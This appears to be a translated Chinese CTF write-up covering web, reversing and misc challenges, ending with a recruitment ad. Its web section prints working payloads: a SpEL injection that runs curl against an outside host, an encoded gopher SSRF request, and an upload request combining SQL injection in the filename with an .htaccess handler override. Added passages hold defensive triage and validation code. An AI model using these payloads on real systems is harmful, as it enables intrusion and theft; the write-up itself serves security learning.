2nd 網刃杯 CTF Writeup

  • Web
    • ez_java
    • ezjs
    • Sign_in
    • upload
  • Re
    • ez_algorithm
    • 定時啟動 (Timed Launch)
    • Re_function
    • freestyle
  • Misc
    • easyiec
  • Tip

Web

ez_java

package me.su;
import org.springframework.expression.common.TemplateParserContext;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.expression.spel.support.StandardEvaluationContext;
import java.io.IOException;
import java.util.regex.Pattern;

public class demo {
    public static void main(String[] args) {
        // The input is a SpEL template expression; it starts a process through
        // ProcessBuilder, which none of the blacklist patterns below match.
        String name = "#{new ProcessBuilder(new String[]{\"curl\",\"-o\",\"/tmp/1\",\"vps:901\"}).start()}";
        if (blackMatch(name)) {
            System.out.println("die");
            return;
        }
        System.out.println(name);
        System.out.println(getAdvanceValue(name));
    }

    // Parses the string as a "#{...}" template and evaluates it with a
    // StandardEvaluationContext, which permits type references and constructors.
    public static String getAdvanceValue(String val) {
        return new SpelExpressionParser().parseExpression(val, new TemplateParserContext()).getValue(new StandardEvaluationContext()).toString();
    }

    // 34 == Pattern.CASE_INSENSITIVE | Pattern.DOTALL
    private static boolean blackMatch(String val) {
        for (String keyword : getBlacklist()) {
            if (Pattern.compile(keyword, 34).matcher(val).find()) {
                return true;
            }
        }
        return false;
    }

    // Denylist: only these three patterns are rejected.
    private static String[] getBlacklist() {
        return new String[]{"java.+lang", "Runtime", "exec.*\\("};
    }
}

ezjs

The original challenge is from https://www.anquanke.com/post/id/248170#h3-7

Compared with the original, this version only adds a blacklist filter. Testing showed that it blocks return, execSync, flag, sh, rm and so on. Because return is filtered there is no direct output, so the challenge becomes command execution without echo.

The flag was finally exfiltrated out of band with wget using the following payload:

flag{n0D3_1s_V3rY_v3Ry_very_v3rY_Fun_1sNt_it}


Sign_in

http://124.220.9.19:8091/?url=gopher://172.73.23.100:80/_%50%4f%53%54%25%32%30%2f%25%33%46%61%25%33%44%31%25%32%30%48%54%54%50%2f%31%2e%31%25%30%44%25%30%41%48%6f%73%74%25%33%41%25%32%30%31%37%32%2e%37%33%2e%32%33%2e%31%30%30%25%33%41%38%30%25%30%44%25%30%41%58%2d%46%6f%72%77%61%72%64%65%64%2d%46%6f%72%25%33%41%25%32%30%31%32%37%2e%30%2e%30%2e%31%25%30%44%25%30%41%58%2d%4f%72%69%67%69%6e%61%74%69%6e%67%2d%49%50%25%33%41%25%32%30%31%32%37%2e%30%2e%30%2e%31%25%30%44%25%30%41%58%2d%52%65%6d%6f%74%65%2d%49%50%25%33%41%25%32%30%31%32%37%2e%30%2e%30%2e%31%25%30%44%25%30%41%58%2d%52%65%6d%6f%74%65%2d%41%64%64%72%25%33%41%25%32%30%31%32%37%2e%30%2e%30%2e%31%25%30%44%25%30%41%52%65%66%65%72%65%72%25%33%41%25%32%30%62%6f%6c%65%61%6e%2e%63%6c%75%62%25%30%44%25%30%41%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%25%33%41%25%32%30%33%25%30%44%25%30%41%43%6f%6e%74%65%6e%74%2d%54%79%70%65%25%33%41%25%32%30%61%70%70%6c%69%63%61%74%69%6f%6e%2f%78%2d%77%77%77%2d%66%6f%72%6d%2d%75%72%6c%65%6e%63%6f%64%65%64%25%30%44%25%30%41%25%30%44%25%30%41%62%25%33%44%31%25%30%44%25%30%41%25%30%44%25%30%41
import urllib.parse

# Raw HTTP request to be sent through gopher://. The blank line separates the
# headers from the body, and the request must end with a line break, because a
# trailing line break marks the end of the HTTP request.
test = \
"""POST /?a=1 HTTP/1.1
Host: 172.73.23.100:80
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
Referer: bolean.club
Content-Length: 3
Content-Type: application/x-www-form-urlencoded

b=1

"""
# Percent-encode once for the gopher selector, then turn LF into the CRLF HTTP expects.
tmp = urllib.parse.quote(test)
new = tmp.replace('%0A', '%0D%0A')
# '_' is the gopher item type placed in front of the raw payload.
result = '_' + new
print(result)
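The gopher:// URL above is exactly what an SSRF attempt looks like in an access log. As an added example (not part of the writeup), the following Python decodes such a logged request target back into the raw HTTP request it would make the server send to the inner host, and flags the usual SSRF indicators: a non-HTTP scheme, a loopback, private or link-local target, and client-IP headers in the smuggled request. The `url` parameter name is taken from the writeup's URL; the other sample log entries are constructed.

```python
"""Triage ?url= parameters from an access log and decode gopher:// SSRF payloads."""
import ipaddress
from urllib.parse import parse_qs, unquote_to_bytes, urlsplit

# The writeup's request target, split into pieces only for readability.
WRITEUP_URL = (
    "http://124.220.9.19:8091/?url=gopher://172.73.23.100:80/_"
    "%50%4f%53%54%25%32%30"                                   # "POST "
    "%2f%25%33%46%61%25%33%44%31%25%32%30"                     # "/?a=1 "
    "%48%54%54%50%2f%31%2e%31%25%30%44%25%30%41"               # "HTTP/1.1\r\n"
    "%48%6f%73%74%25%33%41%25%32%30%31%37%32%2e%37%33%2e%32%33%2e%31%30%30%25%33%41%38%30%25%30%44%25%30%41"
    "%58%2d%46%6f%72%77%61%72%64%65%64%2d%46%6f%72%25%33%41%25%32%30%31%32%37%2e%30%2e%30%2e%31%25%30%44%25%30%41"
    "%58%2d%4f%72%69%67%69%6e%61%74%69%6e%67%2d%49%50%25%33%41%25%32%30%31%32%37%2e%30%2e%30%2e%31%25%30%44%25%30%41"
    "%58%2d%52%65%6d%6f%74%65%2d%49%50%25%33%41%25%32%30%31%32%37%2e%30%2e%30%2e%31%25%30%44%25%30%41"
    "%58%2d%52%65%6d%6f%74%65%2d%41%64%64%72%25%33%41%25%32%30%31%32%37%2e%30%2e%30%2e%31%25%30%44%25%30%41"
    "%52%65%66%65%72%65%72%25%33%41%25%32%30%62%6f%6c%65%61%6e%2e%63%6c%75%62%25%30%44%25%30%41"
    "%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%25%33%41%25%32%30%33%25%30%44%25%30%41"
    "%43%6f%6e%74%65%6e%74%2d%54%79%70%65%25%33%41%25%32%30%61%70%70%6c%69%63%61%74%69%6f%6e%2f%78%2d%77%77%77%2d%66%6f%72%6d%2d%75%72%6c%65%6e%63%6f%64%65%64%25%30%44%25%30%41"
    "%25%30%44%25%30%41%62%25%33%44%31%25%30%44%25%30%41%25%30%44%25%30%41"   # "\r\nb=1\r\n\r\n"
)

# Constructed sample log entries (request-target column only) to triage alongside it.
SAMPLE_LOG = [
    "/?url=http://example.com/index.html",
    "/?url=http://169.254.169.254/latest/meta-data/",
    "/?url=file:///etc/passwd",
    WRITEUP_URL,
]

RISKY_SCHEMES = {"gopher", "file", "dict", "ftp", "ldap"}
# Headers a smuggled request may set to pose as a trusted client address.
CLIENT_IP_HEADERS = {"x-forwarded-for", "x-originating-ip", "x-remote-ip", "x-remote-addr", "x-real-ip"}


def extract_url_params(request_target):
    """Every value of the ?url= parameter, percent-decoded once (as the server sees it)."""
    return parse_qs(urlsplit(request_target).query).get("url", [])


def decode_gopher(gopher_url):
    """gopher://host:port/<type><selector>: the selector is percent-encoded raw TCP bytes.
    Returns (host, port, raw_bytes); the item-type character ('_' here) is dropped."""
    parts = urlsplit(gopher_url)
    selector = parts.path[1:]                                   # strip the leading '/'
    raw = unquote_to_bytes(selector[1:]) if selector else b""
    return parts.hostname, parts.port, raw


def parse_http_request(raw):
    """Minimal HTTP/1.x request parser; returns None if the bytes are not an HTTP request."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    try:
        method, target, version = lines[0].split(" ", 2)
    except ValueError:
        return None
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version, "headers": headers, "body": body}


def is_internal(host):
    """True for loopback, RFC 1918 and link-local (cloud metadata) addresses."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return host == "localhost"
    return ip.is_private or ip.is_loopback or ip.is_link_local


def triage(request_target):
    """List of human-readable SSRF indicators for one logged request target."""
    findings = []
    for url in extract_url_params(request_target):
        parts = urlsplit(url)
        scheme = parts.scheme.lower()
        if scheme in RISKY_SCHEMES:
            findings.append(f"non-http scheme {scheme}://")
        if parts.hostname and is_internal(parts.hostname):
            findings.append(f"internal target {parts.hostname}")
        if scheme == "gopher":
            host, port, raw = decode_gopher(url)
            req = parse_http_request(raw)
            if req:
                spoof = sorted(CLIENT_IP_HEADERS & set(req["headers"]))
                findings.append(f"gopher smuggles {req['method']} {req['target']} to {host}:{port}"
                                + (f" with client-IP headers {spoof}" if spoof else ""))
    return findings


if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(entry[:60], "->", triage(entry) or "clean")
```

Note that 172.73.23.100 is not in a private range, so the writeup's target is caught by the scheme check and the decoded request, not by the address check; an allowlist of permitted destination hosts on the fetching server would stop all four samples.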

upload

POST / HTTP/1.1
Host: 124.220.9.19:8001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------1470817923043980331208184612
Content-Length: 391
Origin: http://124.220.9.19:8001
Connection: close
Referer: http://124.220.9.19:8001/
Upgrade-Insecure-Requests: 1

-----------------------------1470817923043980331208184612
Content-Disposition: form-data; name="upfile"; filename="1a' or updatexml(1,concat(0x7e,(select substr(flag,16,32) from flag)),0) or'"
Content-Type: ctf

<FilesMatch "1.gif">
SetHandler application/x-httpd-php
AddHandler php5-script .gif
</FilesMatch>
-----------------------------1470817923043980331208184612--
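The request above combines a filename that carries SQL injection with a body that is really an Apache .htaccess fragment. As an added example, not the challenge's code, the following Python shows the server-side checks that would stop both: an allowlist on the filename, a magic-byte check against the declared extension, a scan for handler directives in the content, and a parameterized insert so that the quote in the filename stays data. The allowlist, the sqlite schema and the clean sample upload are assumptions made for this example.

```python
"""Server-side validation for a file-upload endpoint."""
import re
import sqlite3

# Filename and body from the request above, as the server would receive them.
PAGE_FILENAME = "1a' or updatexml(1,concat(0x7e,(select substr(flag,16,32) from flag)),0) or'"
PAGE_BODY = (b'<FilesMatch "1.gif">\n'
             b'SetHandler application/x-httpd-php\n'
             b'AddHandler php5-script .gif\n'
             b'</FilesMatch>\n')

# Constructed clean upload (a 1x1 GIF) for comparison.
CLEAN_FILENAME = "photo.gif"
CLEAN_BODY = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff,"
              b"\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;")

# Policy assumed for this example: short alphanumeric base name plus one allowlisted extension.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})$")
ALLOWED_EXTENSIONS = {"gif", "png", "jpg", "jpeg"}
MAGIC = {"gif": (b"GIF87a", b"GIF89a"), "png": (b"\x89PNG\r\n\x1a\n",),
         "jpg": (b"\xff\xd8\xff",), "jpeg": (b"\xff\xd8\xff",)}
# Apache configuration directives that have no business inside an image upload.
DIRECTIVE = re.compile(rb"<FilesMatch|<Files|SetHandler|AddHandler|AddType|php_value|php_flag", re.I)
SQL_OR_PATH_CHARS = set("'\"`;()\\/\x00")


def validate_upload(filename, content):
    """Return the list of policy violations; an empty list means the upload is acceptable."""
    findings = []
    m = SAFE_NAME.match(filename)
    if not m:
        findings.append("filename does not match the allowlist pattern")
    if SQL_OR_PATH_CHARS & set(filename):
        findings.append("SQL or path metacharacters in filename")
    ext = m.group(1).lower() if m else None
    if ext is not None and ext not in ALLOWED_EXTENSIONS:
        findings.append(f"extension .{ext} is not allowed")
    if ext in MAGIC and not content.startswith(MAGIC[ext]):
        findings.append(f"content does not look like a .{ext} file")
    if DIRECTIVE.search(content):
        findings.append("Apache handler directive in content")
    return findings


def make_db():
    """In-memory table standing in for the upload log the challenge injects into."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE uploads (id INTEGER PRIMARY KEY, name TEXT NOT NULL)")
    return conn


def store_filename(conn, filename):
    """Insert with a bound parameter: the quote in the filename is data, never SQL.
    Returns the stored name read back from the table."""
    conn.execute("INSERT INTO uploads (name) VALUES (?)", (filename,))
    row = conn.execute("SELECT name FROM uploads WHERE name = ?", (filename,)).fetchone()
    return row[0]


if __name__ == "__main__":
    for name, body in ((PAGE_FILENAME, PAGE_BODY), (CLEAN_FILENAME, CLEAN_BODY)):
        print(repr(name[:30]), validate_upload(name, body) or "ok")
    print(store_filename(make_db(), PAGE_FILENAME) == PAGE_FILENAME)
```

The filename check and the parameterized query are independent layers: even if a name slipped past the allowlist, the bound parameter keeps updatexml() out of the query, and even if the database were not involved, the directive scan keeps the .htaccess content from ever reaching the web root.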

Re

ez_algorithm

A tedious mix of shift and substitution encryption.

char *__fastcall encryption(char *a1)
{
  int v1; // eax
  char v2; // al
  char v3; // al
  __int64 v4; // kr00_8
  char v5; // al
  char v6; // al
  int v7; // eax
  char v8; // al
  char v9; // al
  char v10; // al
  char v11; // al
  char v12; // al
  char v14[1012]; // [rsp+20h] [rbp-60h] BYREF
  int v15; // [rsp+414h] [rbp+394h]
  const char *v16; // [rsp+418h] [rbp+398h]
  const char *small; // [rsp+420h] [rbp+3A0h]
  int v18; // [rsp+42Ch] [rbp+3ACh]
  char *v19; // [rsp+430h] [rbp+3B0h]
  char *v20; // [rsp+438h] [rbp+3B8h]

  small = xyp2();
  v16 = xyp3();
  v20 = v14;
  v19 = a1;
  v18 = 0;
  v15 = 1;
  while ( v18 < strlen(a1) )
  {
    if ( *v19 <= 64 || *v19 > 90 )
    {
      if ( *v19 <= 96 || *v19 > 122 )
      {
        if ( *v19 == '_' )
        {
          switch ( v15 + rand() % 7 )
          {
            case 0:
              *v20 = ':';
              break;
            case 1:
              *v20 = '&';
              break;
            case 2:
              *v20 = '+';
              break;
            case 3:
              *v20 = '*';
              break;
            case 4:
              *v20 = '\\';
              break;
            case 5:
              *v20 = '?';
              break;
            case 6:
              *v20 = '$';
              break;
            case 7:
              *v20 = '#';
              break;
            default:
              break;
          }
        }
        else if ( *v19 <= 47 || *v19 > 57 )
        {
          *v20 = *v19;
        }
        else
        {
          v12 = encryption2(*v19);
          *v20 = v12;
        }
      }
      else                                      // lowercase letter
      {
        v7 = v18 % 4;
        if ( v18 % 4 == 1 )
        {
          v9 = encryption2(small[(*v19 - 97) * (v18 % 4)]);
          *v20 = v9;
        }
        else if ( v7 > 1 )
        {
          if ( v7 == 2 )
          {
            v10 = encryption2(small[(*v19 - 97) ^ (v18 % 4)]);
            *v20 = v10;
          }
          else if ( v7 == 3 )
          {
            v11 = encryption2(small[*v19 - 97 + v18 % 4]);
            *v20 = v11;
          }
        }
        else if ( !v7 )
        {
          v8 = encryption2(small[*v19 - 97 - v18 % 4]);
          *v20 = v8;
        }
      }
    }
    else                                        // uppercase letter
    {
      v1 = v18 % 4;
      if ( v18 % 4 == 1 )
      {
        v3 = encryption2(v16[*v19 - 65 + v18 % 4]);
        *v20 = v3;
      }
      else if ( v1 > 1 )
      {
        if ( v1 == 2 )
        {
          v4 = v18 * (*v19 - 65);
          v5 = encryption2(v16[(((HIDWORD(v4) >> 30) + (unsigned __int8)v18 * (*v19 - 65)) & 3) - (HIDWORD(v4) >> 30)]);
          *v20 = v5;
        }
        else if ( v1 == 3 )
        {
          v6 = encryption2(v16[(*v19 - 65) ^ (v18 % 4)]);
          *v20 = v6;
        }
      }
      else if ( !v1 )
      {
        v2 = encryption2(v16[*v19 - 65 - v18 % 4]);
        *v20 = v2;
      }
    }
    ++v18;
    ++v19;
    ++v20;
  }
  return v14;
}

Based on how the program treats digits, uppercase letters and lowercase letters differently, we write the decryption script:

s = list(b"WQUTYBXDOFVRKHCGSMLJAZENIP")  # table behind uppercase ciphertext letters
t = list(b"gskfcqtioutrvenjwlpmadybhx")  # table behind lowercase ciphertext letters
enc = "BRUF{E6oU9Ci#J9+6nWAhwMR9n:}"
enc = list(enc.encode())
for i in range(28):
    if enc[i] >= 65 and enc[i] <= 90:
        # uppercase ciphertext came from a lowercase plaintext letter;
        # undo the position-dependent (i % 4) index transform
        index = s.index(enc[i])
        if i%4 == 0:
            tmp = index+97
        elif i%4 == 1:
            tmp = index+97
        elif i%4 == 2:
            tmp = (index^2)+97
        else:
            tmp = (index-3)+97
        enc[i] = tmp
    elif enc[i] >= 97 and enc[i] <= 122:
        # lowercase ciphertext came from an uppercase plaintext letter
        index = t.index(enc[i])
        if i%4 == 0:
            tmp = index+65
        elif i%4 == 1:
            tmp = (index-1)+65
        elif i%4 == 2:
            tmp = (index^2)+65
        else:
            tmp = (index^3)+65
        enc[i] = tmp
    elif enc[i] >= 48 and enc[i] <= 57:
        # digits are mirrored: '0' <-> '9', '1' <-> '8', ...
        tmp = 105-enc[i]
        enc[i] = tmp

print(bytes(enc))
#flag{w3Lc0mE#t0+3NcrYPti0N:}

This final result has several possible readings (the separator for `_` is chosen by rand() in the binary); from the meaning of the flag we infer that the words are joined with `_`.

Combining them gives the flag:

flag{w3Lc0mE_t0_3NcrYPti0N:}

定時啟動 (Timed Launch)

Set the system time to around 2022-04-24 09:09:09 and run the squid program repeatedly, deleting the Readme.txt it generates in the current directory after each run (testing showed that the program decides whether this is its second run by checking for a Readme.txt in the current directory).

After several attempts we get the flag.


Re_function

The zip archive's comment field contains a block of data; copying it out shows that it is an image, and at the end of the image there is a base-encoded string that decodes to the archive password.

The first program is the encryption routine.

Decrypting gives: SqcTSxCxSAwHGm/JvxQrvxiNjR9=

>>> s = [0x64, 0x71, 0x54, 0x54, 0x64, 0x78, 0x74, 0x78, 0x64, 0x41, 0x40, 0x48, 0x70, 0x6D, 0x18, 0x4A, 0x41, 0x78, 0x66, 0x72, 0x41, 0x78, 0x5E, 0x4E, 0x5D, 0x52, 0x0E, 0x3D]
>>> s = [s[i]^0x37 for i in range(0, 28, 2)]
>>> s
[83, 99, 83, 67, 83, 119, 71, 47, 118, 81, 118, 105, 106, 57]
>>> bytes(s)
b'ScSCSwG/vQvij9'
>>> s = [0x64, 0x71, 0x54, 0x54, 0x64, 0x78, 0x74, 0x78, 0x64, 0x41, 0x40, 0x48, 0x70, 0x6D, 0x18, 0x4A, 0x41, 0x78, 0x66, 0x72, 0x41, 0x78, 0x5E, 0x4E, 0x5D, 0x52, 0x0E, 0x3D]
>>> for i in range(28):
...     if i%2 == 0:
...             s[i] ^= 0x37
...
>>> s
[83, 113, 99, 84, 83, 120, 67, 120, 83, 65, 119, 72, 71, 109, 47, 74, 118, 120, 81, 114, 118, 120, 105, 78, 106, 82, 57, 61]
>>> bytes(s)
b'SqcTSxCxSAwHGm/JvxQrvxiNjR9='

The second program is a base64 decoder with a substituted alphabet; running the data recovered from the first program through that custom-alphabet base64 decode yields the flag.
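The writeup names the second stage as custom-alphabet base64 but does not list the alphabet. As an added example that is not the challenge's or the writeup's code, the following Python generalises both steps: the every-other-byte XOR from the REPL session above, and base64 decoding against any 64-character alphabet by translating it onto the standard table first. ALT_ALPHABET is a constructed placeholder (the standard alphabet rotated by 17 positions); the table recovered from the binary would be substituted for it, and only then does recover() yield the flag.

```python
"""Stage 1 XOR and custom-alphabet base64 decoding."""
import base64

STD_ALPHABET = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
# Constructed placeholder for the challenge's real table.
ALT_ALPHABET = STD_ALPHABET[17:] + STD_ALPHABET[:17]

# Bytes produced by the first program, as shown in the REPL session above.
STAGE1 = bytes([0x64, 0x71, 0x54, 0x54, 0x64, 0x78, 0x74, 0x78, 0x64, 0x41, 0x40, 0x48,
                0x70, 0x6D, 0x18, 0x4A, 0x41, 0x78, 0x66, 0x72, 0x41, 0x78, 0x5E, 0x4E,
                0x5D, 0x52, 0x0E, 0x3D])


def xor_even_bytes(data, key=0x37):
    """Undo the first program: every byte at an even offset was XORed with key."""
    return bytes(b ^ key if i % 2 == 0 else b for i, b in enumerate(data))


def _check_alphabet(alphabet):
    if len(alphabet) != 64 or len(set(alphabet)) != 64 or 0x3D in alphabet:
        raise ValueError("alphabet must be 64 distinct bytes and must not contain '='")


def decode_custom_base64(text, alphabet):
    """Decode base64 text written with `alphabet` by mapping it onto the standard table."""
    if isinstance(text, str):
        text = text.encode()
    _check_alphabet(alphabet)
    if not set(text) <= set(alphabet) | {0x3D}:
        raise ValueError("input contains bytes outside the alphabet")
    translated = text.translate(bytes.maketrans(alphabet, STD_ALPHABET))
    return base64.b64decode(translated)


def encode_custom_base64(raw, alphabet):
    """Inverse of decode_custom_base64, useful for round-trip checks of a recovered table."""
    _check_alphabet(alphabet)
    return base64.b64encode(raw).translate(bytes.maketrans(STD_ALPHABET, alphabet))


def recover(stage1_bytes, alphabet):
    """Both stages in order: XOR the even offsets, then custom-alphabet base64 decode."""
    return decode_custom_base64(xor_even_bytes(stage1_bytes), alphabet)


if __name__ == "__main__":
    print(xor_even_bytes(STAGE1))              # b'SqcTSxCxSAwHGm/JvxQrvxiNjR9='
    print(recover(STAGE1, ALT_ALPHABET))       # garbage until the real table is substituted
```

A quick sanity check for a recovered table is that it has 64 distinct bytes and that encoding a known plaintext and decoding it again round-trips; both checks are built into the functions above.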

freestyle

Reversing fun1 and fun2 shows that the two inputs must satisfy the following conditions:

fun1: ( 4 * (3 * atoi(s) / 9 - 9) != 4400 )
fun2: ( 2 * (atoi(s) % 56) != 98 )

The challenge also hints that the MD5 value is needed, so we write a script to derive the key:

key1 = (4400/4 + 9) * 3
key2 = (98/2) + n*56
key = str(key1)[:-2] + str(key2)[:-2]

MD5:

import hashlib

def getmd5(text):
    m = hashlib.md5()
    m.update(text.encode("utf-8"))
    return m.hexdigest()

# key1 is fixed by fun1; fun2 only fixes key2 modulo 56, so try several candidates
key1 = (4400 // 4 + 9) * 3        # 3327
for i in range(1, 8):
    key2 = 98 // 2 + i * 56        # 49 + 56*i
    print(key1)
    print(key2)
    key = str(key1) + str(key2)
    print(getmd5(key))

Misc

easyiec

Given the packet capture, just run strings on it:

strings ./easyiec/easyiec.pcap | grep 'flag'

which gives the flag: flag{e45y_1eci04}

Tip

Do you want to join a security team

with a better learning atmosphere?

Then join EDI Security. The bar is not high, but the seniors are experienced and can take you along from the basics, as long as you have the determination to keep working at it.

EDI Security's CTF team regularly takes part in the major CTF competitions and follows the CTF scene; we are working to build a good technical atmosphere in the security community, and this is definitely a good place to learn. The bar is not high, but the seniors are experienced and can take you along from the basics; as long as you have the determination to keep working at it, the next CTF star could be you.

Experts and beginners alike are welcome; let's play CTF together and improve together.

We dig for talent so that you are not buried!

Your joining brings us new energy, and we can likewise give you unlimited room to grow.

Anyone interested, please contact [email protected] (include your résumé, covering your study direction, learning experience and so on).
